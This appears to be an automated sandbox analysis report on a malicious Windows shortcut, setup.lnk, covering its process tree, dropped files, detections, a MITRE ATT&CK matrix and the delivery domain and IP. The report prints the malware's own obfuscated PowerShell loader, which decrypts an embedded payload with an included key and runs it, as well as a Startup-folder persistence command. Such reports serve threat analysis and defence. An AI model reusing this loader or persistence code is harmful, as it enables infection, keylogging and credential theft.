              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $giwxcqo = 'aaaaaaaaaaaaaaaaaaaaah+ni+e0b2ks3mmnd0sjpk+fk7mupfilz9vvektme+yyv7vbgriarnlhwocdd3xnpyazs1tppp56hnlmknzg3rqllzowww3pr9gtvi4pqrfz4ymgg1kimek8k6tsh0fmp/6pzslccm7m343xsrtqho71kivioxddv9rxueizsvv/r8wv5pa7k2heaf/g1dnaet06jn6lwy+3xxybiz8z2sgfrwiakmlk9dab/leruy0oedx+hdr0opeuvodl8s3tyxpu555rlx05ctd0togq2y+lnpx6fd4bm0mfpap0pqtz0trl0pba/499qw6oyztygixjq47fiytqqcaizp9wkwplfvpxmsua7noylmdcjhqwuyn6keasq952ex0uepaiptsxaqoa6loyomefpb1evpj3uzmpl9bhjdqjhn1/olox0/aplc7vbmqv7fidtyco5ezzrtdcgspb4g8s6vz9sjg0qng+jhmufydvdumhxrj23a1qyqubslmhjdw4snduud7htfvqeags/sl3nlutqkpifmztty2alus2sdq4ofb+z/wvupl80+6+lh5xqnj8m1zd2oz2juag9qcds6ed1lwbdfwkgk1cexwfukroqw+5t52gj98o+jln7pagkzcbb87qc9dofnvz0xr6nvkj3ydwbpve9gy2ursq2smekc28xeg/ogbv4h/40vymmq48szmio+dl98hetduyjda10+uktzg0zrz9tre7n2dualc7akhfke8xxtlsjebjab+74tbyhg6tbn3q8jestwfhavcg/74qyryhv51rgapus4yimlfgdci+kn5tho8qhfy2apvsjgwwvc4nanwywkeodgvs3cud2h7z0etr930+qcff';$pavnvyn = 'ew1fbe1lt2rgdgv3txdrulpywffrbnzgefdtd1r3z2w=';$hgjhdnd = new-object 'system.security.cryptography.aesmanaged';$hgjhdnd.mode = [system.security.cryptography.ciphermode]::ecb;$hgjhdnd.padding = [system.security.cryptography.paddingmode]::zeros;$hgjhdnd.blocksize = 128;$hgjhdnd.keysize = 256;$hgjhdnd.key = [system.convert]::frombase64string($pavnvyn);$fmshi = [system.convert]::frombase64string($giwxcqo);$hwklsipl = $fmshi[0..15];$hgjhdnd.iv = $hwklsipl;$bkvkozaiu = $hgjhdnd.createdecryptor();$wonqxsfki = $bkvkozaiu.transformfinalblock($fmshi, 16, $fmshi.length - 16);$hgjhdnd.dispose();$lmmkhz = new-object system.io.memorystream( , $wonqxsfki );$dylrlk = new-object system.io.memorystream;$cyowfotfz = new-object system.io.compression.gzipstream $lmmkhz, ([io.compression.compressionmode]::decompress);$cyowfotfz.copyto( $dylrlk );$cyowfotfz.close();$lmmkhz.close();[byte[]] $ohxploz = $dylrlk.toarray();$mkeeaj = [system.text.encoding]::utf8.getstring($ohxploz);$mkeeaj | powershell -Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & echo url="c:\users\user\appdata\local\neuraconnect technologies\neuralink.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & exit
              Source: Identification.pif, 00000019.00000000.2206363130.00000000002CD000.00000002.00000001.01000000.00000010.sdmp, Identification.pif, 00000019.00000003.2476011355.0000000005604000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000019.00000003.2476202172.00000000056F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D76210 cpuid 12_2_00D76210
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: GetLastError,wsprintfW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,12_2_00D65E70
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D64C30 lstrlenW,_DebugHeapAllocator,GetSystemTimeAsFileTime,GetFileAttributesW,memcpy,12_2_00D64C30

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000019.00000003.2987224346.0000000001500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000019.00000003.2987224346.0000000001500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              1
              Scripting
              1
              Exploitation for Privilege Escalation
              1
              Obfuscated Files or Information
              121
              Input Capture
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              11
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Software Packing
              LSASS Memory3
              File and Directory Discovery
              Remote Desktop Protocol1
              Email Collection
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              12
              Process Injection
              1
              DLL Side-Loading
              Security Account Manager44
              System Information Discovery
              SMB/Windows Admin Shares121
              Input Capture
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts21
              PowerShell
              Login Hook1
              Registry Run Keys / Startup Folder
              111
              Masquerading
              NTDS111
              Security Software Discovery
              Distributed Component Object ModelInput Capture14
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script41
              Virtualization/Sandbox Evasion
              LSA Secrets13
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
              Process Injection
              Cached Domain Credentials41
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1395713 Sample: setup.lnk Startdate: 20/02/2024 Architecture: WINDOWS Score: 100 76 whitemansearch.shop 2->76 92 Malicious sample detected (through community Yara rule) 2->92 94 Antivirus detection for URL or domain 2->94 96 Windows shortcut file (LNK) starts blacklisted processes 2->96 98 8 other signatures 2->98 14 forfiles.exe 1 2->14         started        17 svchost.exe 1 2->17         started        signatures3 process4 dnsIp5 120 Windows shortcut file (LNK) starts blacklisted processes 14->120 20 powershell.exe 7 14->20         started        23 conhost.exe 1 14->23         started        74 127.0.0.1 unknown unknown 17->74 signatures6 process7 signatures8 100 Found suspicious powershell code related to unpacking or dynamic code loading 20->100 102 Powershell drops PE file 20->102 25 mshta.exe 17 20->25         started        process9 dnsIp10 84 whitemansearch.shop 5.101.153.86, 49705, 49719, 80 BEGET-ASRU Russian Federation 25->84 114 Windows shortcut file (LNK) starts blacklisted processes 25->114 116 Suspicious powershell command line found 25->116 29 powershell.exe 20 25->29         started        signatures11 process12 signatures13 118 Windows shortcut file (LNK) starts blacklisted processes 29->118 32 powershell.exe 14 48 29->32         started        35 conhost.exe 29->35         started        process14 file15 66 C:\Users\user\AppData\...\ClassroomEc.exe, PE32 32->66 dropped 37 ClassroomEc.exe 11 32->37         started        41 chrome.exe 8 32->41         started        44 WmiPrvSE.exe 32->44         started        process16 dnsIp17 68 C:\Users\user\AppData\Local\...\Producing, PE32 37->68 dropped 104 Windows shortcut file (LNK) starts blacklisted processes 37->104 106 Multi AV Scanner detection for dropped file 37->106 108 Contains functionality to register a low level keyboard hook 37->108 46 cmd.exe 1 37->46         started        49 conhost.exe 37->49         started        86 192.168.2.13 unknown unknown 41->86 88 192.168.2.15 unknown unknown 41->88 90 4 other IPs or domains 41->90 51 chrome.exe 41->51         started        file18 signatures19 process20 dnsIp21 122 Windows shortcut file (LNK) starts blacklisted processes 46->122 124 Uses ping.exe to sleep 46->124 126 Drops PE files with a suspicious file extension 46->126 128 Uses ping.exe to check the status of other devices and networks 46->128 54 Identification.pif 46->54         started        58 cmd.exe 46->58         started        60 conhost.exe 46->60         started        62 7 other processes 46->62 78 accounts.google.com 142.250.31.84, 443, 49714 GOOGLEUS United States 51->78 80 142.250.72.110 GOOGLEUS United States 51->80 82 6 other IPs or domains 51->82 signatures22 process23 file24 70 C:\Users\user\AppData\Local\...70euraLink.pif, PE32 54->70 dropped 110 Windows shortcut file (LNK) starts blacklisted processes 54->110 112 Drops PE files with a suspicious file extension 54->112 64 cmd.exe 54->64         started        72 C:\Users\user\AppData\...\Identification.pif, PE32 58->72 dropped signatures25 process26

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              setup.lnk8%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif5%ReversingLabs
              C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pif5%ReversingLabs
              C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Producing3%ReversingLabs
              C:\Users\user\AppData\Roaming\ClassroomEc.exe29%ReversingLabsWin32.Trojan.Nekark
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://oneget.orgX0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://go.micro0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://crl.v0%URL Reputationsafe
              https://oneget.org0%URL Reputationsafe
              https://2no.co/2ZrVm4;Set-ItemProperty100%Avira URL Cloudmalware
              http://whitemansearch.shop/setup.0%Avira URL Cloudsafe
              http://whitemansearch.shop/setup...JL0%Avira URL Cloudsafe
              http://whitemansearch.shop/setupv30%Avira URL Cloudsafe
              http://whitemansearch.shop/ClassroomEc.exep0%Avira URL Cloudsafe
              about:blank0%Avira URL Cloudsafe
              http://whitemansearch.shop/ClassroomEc.exe0%Avira URL Cloudsafe
              http://whitemansearch.shop/setup480%Avira URL Cloudsafe
              http://whitemansearch.shop/setup(0%Avira URL Cloudsafe
              https://2no.co/2ZrVm4100%Avira URL Cloudmalware
              http://whitemansearch.shop/setupR0%Avira URL Cloudsafe
              http://whitemansearch.shop/setup90%Avira URL Cloudsafe
              http://whitemansearch.shop/setupQ0%Avira URL Cloudsafe
              http://whitemansearch.shop/setupC:0%Avira URL Cloudsafe
              http://whitemansearch.shop/setupaProgramFil0%Avira URL Cloudsafe
              http://whitemansearch.shop/setupK0%Avira URL Cloudsafe
